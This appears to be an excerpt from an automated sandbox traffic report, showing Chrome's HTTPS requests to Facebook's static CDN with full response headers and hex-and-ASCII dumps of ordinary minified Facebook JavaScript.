                                                                                                                                                                                                                                  Data Ascii: ze:"xngnso2",wordWrap:"x1vvkbs",$$css:!0},hr:{backgroundColor:"x42x0ya",borderTopStyle:"x1ejq31n",borderEndStyle:"xd10rxx",borderBottomStyle:"x1sy0etr",borderStartStyle:"x17r0tee",borderTopWidth:"x972fbf",borderEndWidth:"xcfux6l",borderBottomWidth:"x1qhh9
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC14884INData Raw: 73 74 2c 62 2e 62 6c 6f 63 6b 5d 3b 65 3d 7b 61 3a 65 2c 61 72 74 69 63 6c 65 3a 66 2c 61 73 69 64 65 3a 64 2c 62 3a 6f 2c 62 64 69 3a 70 2c 62 64 6f 3a 71 2c 62 6c 6f 63 6b 71 75 6f 74 65 3a 72 2c 62 72 3a 73 2c 62 75 74 74 6f 6e 3a 74 2c 63 6f 64 65 3a 75 2c 64 65 6c 3a 76 2c 64 69 76 3a 77 2c 65 6d 3a 78 2c 66 69 65 6c 64 73 65 74 3a 79 2c 66 6f 6f 74 65 72 3a 7a 2c 66 6f 72 6d 3a 41 2c 68 31 3a 42 2c 68 32 3a 42 2c 68 33 3a 42 2c 68 34 3a 42 2c 68 35 3a 42 2c 68 36 3a 42 2c 68 65 61 64 65 72 3a 43 2c 68 72 3a 44 2c 69 3a 45 2c 69 6d 67 3a 46 2c 69 6e 70 75 74 3a 47 2c 69 6e 73 3a 48 2c 6b 62 64 3a 49 2c 6c 61 62 65 6c 3a 4a 2c 6c 69 3a 4b 2c 6d 61 69 6e 3a 4c 2c 6e 61 76 3a 4d 2c 6f 6c 3a 4e 2c 6f 70 74 67 72 6f 75 70 3a 4f 2c 6f 70 74 69 6f 6e 3a 50
                                                                                                                                                                                                                                  Data Ascii: st,b.block];e={a:e,article:f,aside:d,b:o,bdi:p,bdo:q,blockquote:r,br:s,button:t,code:u,del:v,div:w,em:x,fieldset:y,footer:z,form:A,h1:B,h2:B,h3:B,h4:B,h5:B,h6:B,header:C,hr:D,i:E,img:F,input:G,ins:H,kbd:I,label:J,li:K,main:L,nav:M,ol:N,optgroup:O,option:P
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC16384INData Raw: 64 65 72 22 29 2e 48 65 72 6f 50 6c 61 63 65 68 6f 6c 64 65 72 55 74 69 6c 73 2e 63 72 65 61 74 65 54 68 65 6e 61 62 6c 65 44 65 73 63 72 69 70 74 69 6f 6e 28 61 2e 74 68 65 6e 61 62 6c 65 73 29 7c 7c 22 4e 6f 20 50 72 6f 6d 69 73 65 73 22 3b 72 65 74 75 72 6e 20 61 2b 62 7d 66 75 6e 63 74 69 6f 6e 20 62 61 28 61 2c 62 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 64 3d 7b 63 6f 6d 6d 69 74 43 6f 75 6e 74 3a 30 2c 6c 61 73 74 42 61 73 65 44 75 72 61 74 69 6f 6e 3a 30 2c 6d 61 78 42 61 73 65 44 75 72 61 74 69 6f 6e 3a 30 2c 74 6f 74 61 6c 41 63 74 75 61 6c 44 75 72 61 74 69 6f 6e 3a 30 2c 74 6f 74 61 6c 43 6f 6d 6d 69 74 44 75 72 61 74 69 6f 6e 3a 30 2c 74 6f 74 61 6c 50 6f 73 74 43 6f 6d 6d 69 74 44 75 72 61 74 69
                                                                                                                                                                                                                                  Data Ascii: der").HeroPlaceholderUtils.createThenableDescription(a.thenables)||"No Promises";return a+b}function ba(a,b){if(a==null)return null;var d={commitCount:0,lastBaseDuration:0,maxBaseDuration:0,totalActualDuration:0,totalCommitDuration:0,totalPostCommitDurati
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC16384INData Raw: 74 69 6f 6e 20 6f 28 61 2c 62 29 7b 61 3d 61 2e 64 61 74 61 3b 76 61 72 20 63 3d 61 21 3d 6e 75 6c 6c 3f 4a 53 4f 4e 2e 70 61 72 73 65 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 61 29 29 3a 6e 75 6c 6c 3b 63 21 3d 6e 75 6c 6c 26 26 62 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 64 65 6c 65 74 65 20 63 5b 61 5d 7d 29 3b 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 70 28 61 2c 62 2c 64 2c 65 2c 66 29 7b 66 6f 72 28 76 61 72 20 67 20 69 6e 20 65 29 7b 76 61 72 20 68 3b 69 66 28 28 68 3d 61 2e 71 70 6c 50 6f 69 6e 74 46 69 6c 74 65 72 52 65 67 65 78 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 68 2e 65 78 65 63 28 67 29 29 63 6f 6e 74 69 6e 75 65 3b 66 6f 72 28 68 3d 30 3b 68 3c 65 5b 67 5d 2e 6c 65 6e 67
                                                                                                                                                                                                                                  Data Ascii: tion o(a,b){a=a.data;var c=a!=null?JSON.parse(JSON.stringify(a)):null;c!=null&&b.forEach(function(a){return delete c[a]});return c}function p(a,b,d,e,f){for(var g in e){var h;if((h=a.qplPointFilterRegex)==null?void 0:h.exec(g))continue;for(h=0;h<e[g].leng
                                                                                                                                                                                                                                  2024-09-29 04:53:21 UTC14884INData Raw: 69 6f 6e 28 61 2c 62 29 7b 62 3d 3d 3d 76 6f 69 64 20 30 26 26 28 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 3b 76 61 72 20 63 3d 64 28 22 68 65 72 6f 2d 74 72 61 63 69 6e 67 22 29 2e 48 65 72 6f 4c 6f 67 67 65 72 2e 67 65 6e 48 65 72 6f 49 6e 74 65 72 61 63 74 69 6f 6e 55 55 49 44 41 6e 64 4d 61 72 6b 53 74 61 72 74 28 61 2e 69 6e 74 65 72 61 63 74 69 6f 6e 49 44 2c 61 2e 73 74 61 72 74 54 69 6d 65 29 3b 72 65 74 75 72 6e 20 77 2e 74 72 61 63 65 28 61 2e 63 66 67 2c 61 2e 64 65 70 73 2c 61 2e 71 70 6c 45 76 65 6e 74 2c 62 2c 61 2e 69 6e 74 65 72 61 63 74 69 6f 6e 43 6c 61 73 73 2c 61 2e 74 72 61 63 65 54 79 70 65 2c 61 2e 74 72 61 63 65 50 6f 6c 69 63 79 2c 63 2c 61 2e 73 74 61 72 74 54 69 6d 65 2c 61 2e 65 76 65 6e 74 51 75 65 75 65 54 69 6d 65 2c 61
                                                                                                                                                                                                                                  Data Ascii: ion(a,b){b===void 0&&(b=function(){});var c=d("hero-tracing").HeroLogger.genHeroInteractionUUIDAndMarkStart(a.interactionID,a.startTime);return w.trace(a.cfg,a.deps,a.qplEvent,b,a.interactionClass,a.traceType,a.tracePolicy,c,a.startTime,a.eventQueueTime,a


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  51192.168.2.649780157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC374OUTGET /rsrc.php/v3/yn/r/BTuEBPL3Mnd.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: SSGtfbAxBhRkHRMbiDwz5Q==
                                                                                                                                                                                                                                  Expires: Fri, 19 Sep 2025 17:03:12 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: kXeclyifGJzn7kDt7pgMb/H1X/4XVsSVw5/ZUwMBHtkE8VZi0rtFx+7hV7hHRV+DJYGfqqxQNw6M7QSNODKm8g==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:20 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=98, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=3, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 24223
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC15872INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 66 6f 72 45 61 63 68 4f 62 6a 65 63 74 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 67 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 2c 63 29 7b 66 6f 72 28 76 61 72 20 64 20 69 6e 20 61 29 7b 76 61 72 20 65 3d 64 3b 67 2e 63 61 6c 6c 28 61 2c 65 29 26 26 62 2e 63 61 6c 6c 28 63 2c 61 5b 65 5d 2c 65 2c 61 29 7d 7d 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 42 61 73 69 63 56 65 63 74 6f 72 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("forEachObject",[],(function(a,b,c,d,e,f){"use strict";var g=Object.prototype.hasOwnProperty;function a(a,b,c){for(var d in a){var e=d;g.call(a,e)&&b.call(c,a[e],e,a)}}f["default"]=a}),66);__d("BasicVector",[],(function(a,b,c,d,e,f)
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC8350INData Raw: 63 2c 73 74 61 72 74 54 69 6d 65 3a 65 2c 65 78 70 69 72 61 74 69 6f 6e 54 69 6d 65 3a 67 2c 73 6f 72 74 49 6e 64 65 78 3a 2d 31 7d 3b 65 3e 66 3f 28 63 2e 73 6f 72 74 49 6e 64 65 78 3d 65 2c 6c 28 74 2c 63 29 2c 6e 75 6c 6c 3d 3d 3d 6d 28 73 29 26 26 63 3d 3d 3d 6d 28 74 29 26 26 28 7a 3f 28 42 28 47 29 2c 47 3d 2d 31 29 3a 7a 3d 21 30 2c 4f 28 45 2c 65 2d 66 29 29 29 3a 28 63 2e 73 6f 72 74 49 6e 64 65 78 3d 67 2c 6c 28 73 2c 63 29 2c 79 7c 7c 78 7c 7c 28 79 3d 21 30 2c 4e 28 29 29 29 3b 72 65 74 75 72 6e 20 63 7d 3b 68 2e 75 6e 73 74 61 62 6c 65 5f 73 68 6f 75 6c 64 59 69 65 6c 64 3d 4a 3b 68 2e 75 6e 73 74 61 62 6c 65 5f 77 72 61 70 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 64 3d 77 3b 72 65 74 75 72 6e 20 66 75 6e 63
                                                                                                                                                                                                                                  Data Ascii: c,startTime:e,expirationTime:g,sortIndex:-1};e>f?(c.sortIndex=e,l(t,c),null===m(s)&&c===m(t)&&(z?(B(G),G=-1):z=!0,O(E,e-f))):(c.sortIndex=g,l(s,c),y||x||(y=!0,N()));return c};h.unstable_shouldYield=J;h.unstable_wrapCallback=function(c){var d=w;return func


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  52192.168.2.649778157.240.251.94431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC581OUTGET /rsrc.php/v3/yK/r/lNInKxOqejp.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  Origin: https://www.facebook.com
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://www.facebook.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: dPGOafzutFE7nyQyK+c4bg==
                                                                                                                                                                                                                                  Expires: Sun, 21 Sep 2025 01:05:36 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: veIQ2j6vFpWrYx0CayQUv+wmoQYSCalcJrcUPLvbfOOu08bjABteji8aFgKlb1c6Ss1itdvorXrtQe2stQqJ7Q==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:20 GMT
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=94, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 10408
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC10407INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 6c 69 63 65 6e 73 65 2f 56 39 76 64 59 43 6f 6c 63 34 6b 2f 0a 20 2a 2f 0a 5f 5f 64 28 22 72 65 61 63 74 2d 30 2e 30 2e 30 22 2c 5b 22 52 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 74 79 70 65 6f 66 20 61 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 22 64 65 66 61 75 6c 74 22 69 6e 20 61 3f 61 5b 22 64 65 66 61 75 6c 74 22 5d 3a 61 7d 76 61 72 20 67 3d 61 28 62 28 22 52 65 61 63 74 22 29 29 3b 64 3d 7b 7d 3b 76 61
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*//** * License: https://www.facebook.com/legal/license/V9vdYColc4k/ */__d("react-0.0.0",["React"],(function(a,b,c,d,e,f){"use strict";function a(a){return a&&typeof a==="object"&&"default"in a?a["default"]:a}var g=a(b("React"));d={};va


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  53192.168.2.649781157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC374OUTGET /rsrc.php/v3/ys/r/pg8jih5T_9q.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: S/RW7UT0dsoYKhdDMbB2ng==
                                                                                                                                                                                                                                  Expires: Thu, 25 Sep 2025 15:36:44 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: eZxJe8gpaGQFuGG/IHdCINLOvBZHu6IwNyMQ3KuOB+zUcS3hBZ+Ru1pMeQA29z8CAXUuexwr4KdXc1v3E2T0Tw==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:20 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=99, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=2, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 17188
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC16384INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 63 73 78 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 63 73 78 3a 20 55 6e 65 78 70 65 63 74 65 64 20 63 6c 61 73 73 20 73 65 6c 65 63 74 6f 72 20 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 2e 22 29 7d 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 67 65 74 4f 72 43 72 65 61 74 65 44 4f 4d 49 44 22 2c 5b 22 75 6e 69 71 75 65 49 44 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 61 2e 69 64 7c 7c 28 61 2e 69 64 3d 63 28 22 75 6e 69 71 75 65 49 44 22
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("csx",[],(function(a,b,c,d,e,f){function a(a){throw new Error("csx: Unexpected class selector transformation.")}f["default"]=a}),66);__d("getOrCreateDOMID",["uniqueID"],(function(a,b,c,d,e,f,g){function a(a){a.id||(a.id=c("uniqueID"
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC803INData Raw: 67 22 26 26 28 61 3d 63 28 22 24 22 29 28 61 29 29 3b 72 65 74 75 72 6e 20 63 28 22 53 74 79 6c 65 43 6f 72 65 22 29 2e 67 65 74 46 6c 6f 61 74 28 61 2c 62 29 7d 7d 29 3b 62 3d 61 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 63 73 73 56 61 72 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 63 73 73 56 61 72 28 22 27 2b 61 2b 27 22 29 3a 20 55 6e 65 78 70 65 63 74 65 64 20 63 6c 61 73 73 20 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 2e 27 29 7d 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 73 65 74 49 6d 6d 65 64 69 61 74 65 22 2c 5b 22 54 69 6d 65 53 6c 69
                                                                                                                                                                                                                                  Data Ascii: g"&&(a=c("$")(a));return c("StyleCore").getFloat(a,b)}});b=a;g["default"]=b}),98);__d("cssVar",[],(function(a,b,c,d,e,f){function a(a){throw new Error('cssVar("'+a+'"): Unexpected class transformation.')}f["default"]=a}),66);__d("setImmediate",["TimeSli


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  54192.168.2.649782157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC374OUTGET /rsrc.php/v3/ye/r/BCReGA2whNu.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:20 UTC1931INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: ubkaRKiel1rYqBTqhjr0kQ==
                                                                                                                                                                                                                                  Expires: Fri, 19 Sep 2025 17:03:12 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
